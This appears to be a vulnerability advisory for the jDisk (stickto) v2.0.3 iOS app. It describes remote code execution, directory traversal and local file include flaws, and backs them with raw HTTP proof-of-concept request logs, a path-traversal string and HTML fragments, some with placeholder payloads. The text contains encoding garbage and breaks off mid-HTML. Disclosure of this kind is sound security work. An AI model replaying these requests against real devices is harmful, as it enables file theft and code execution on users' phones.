jDisk (stickto) v2.0.3 iOS多个漏洞

1.1 The remote code execution can be exploited by remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below. --- PoC Session Logs [POST] --- Status: 200[OK] POST http://localhost:12345/__FD__?action=saveFile&path=[VULNERABLE CODE EXECUTION VALUE!] Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Gr��e des Inhalts[86] Mime Type[text/html] Request Header: Host[localhost:12345] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Content-Type[application/json; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[http://localhost:12345/] Content-Length[14] Cookie[jtable%2376270709page-size=10] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: {"content":"&path=[VULNERABLE CODE EXECUTION VALUE!]"}[] Response Header: Accept-Ranges[bytes] Content-Length[86] Content-Type[text/html] Date[Tue, 11 Feb 2014 23:11:06 GMT] 1.2 The directory-traversal vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below. PoC: http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825 #{"msg":"","success":true,"data":[{"name":"%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","id":"/%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]","type":"file", "size":24386,"changed":"2014-02-12 00:13:49","created":"2014-02-12 00:13:49"}]} --- PoC Session Logs [GET] --- Status: 200[OK] GET http://localhost:12345/__FD__?action=folderContent&folder=%20%2F..%2F..%2F[DIRECTORY TRAVERSAL WEB VULNERABILITY!]&_dc=1392159953825 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr��e des Inhalts[35] Mime Type[text/html] Request Header: Host[localhost:12345] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Cookie[jtable%2376270709page-size=10] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[35] Content-Type[text/html] Date[Tue, 11 Feb 2014 23:14:46 GMT] 1.3 The file include vulnerability can be exploited by remote attackers without user interaction or privileged web-application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below. PoC: <div class="x-grid-row-checker"> </div></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1015 "> <div class="x-grid-cell-inner " style="text-align: left; ;"><div style="position:relative;top:3px"> <img src="JoyfulPhone%C2%AE%20jDisk_file%20include_rename-Dateien/__FD__.txt" style="width:16px;height:16px;"><span style="position:absolute; padding-left: 5px; padding-top:0px">>"<[LOCAL FILE INCLUDE VULNERABILITY!].txt">[LOCAL FILE INCLUDE VULNERABILITY!].jpg</span></div></div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1016 " ><div class="x-grid-cell-inner " style="text-align: left; ;">/</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1017 " ><div class="x-grid-cell-inner " style="text-align: right; ;">23.8 KB</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1018 " ><div class="x-grid-cell-inner " style="text-align: left; ;">2014-02-12 00:13:49</div></td><td class=" x-grid-cell x-grid-cell-gridcolumn-1019 x-grid-cell-last" ><div class="x-grid-cell-inner " style="text-align: left; ;">2014-02-12 00:13:49</div></td></tr></tbody></table></iframe></span></div></div></td></tr></tbody></table></div> PoC: rename - text file <td style="width: 100%;" class="x-form-item-body " id="messagebox-1001-testfield-bodyEl" role="presentation" colspan="3"> <input value=">"<[LOCAL FILE INCLUDE VULNERABILITY!]>[LOCAL FILE INCLUDE VULNERABILITY!].jpg" data-errorqtip="" aria-invalid="false" id="messagebox-1001-testfield-inputEl" size="1" name="messagebox-1001-testfield-inputEl" style="width: 100%; -moz-user-select: text;" class="x-form-field x-form-text x-form-focus x-field-form-focus x-field-default-form-focus" autocomplete="off" type="text"></td></tr></tbody></table> <table id="messagebox-1001-textarea" class="x-field x-form-item x-field-default x-anchor-form-item" style="height: 75px; table-layout: fixed; width: 520px; display: none;" cellpadding="0"><tbody><tr id="messagebox-1001-textarea-inputRow"><td id="messagebox-1001-textarea-labelCell" style="display:none;" halign="left" class="x-field-label-cell" valign="top" width="105"><label id="messagebox-1001-textarea-labelEl" for="messagebox-1001-textarea-inputEl" class="x-form-item-label x-form-item-label-left" style="width:100px;margin-right:5px;"></label></td><td style="width: 100%;" class="x-form-item-body " id="messagebox-1001-textarea-bodyEl" role="presentation" colspan="3"><textarea data-errorqtip="" aria-invalid="false" id="messagebox-1001-textarea-inputEl" name="messagebox-1001-textarea-inputEl" rows="4" cols="20" class="x-form-field x-form-text" style="width: 100%; height: 75px; -moz-user-select: text;" autocomplete="off">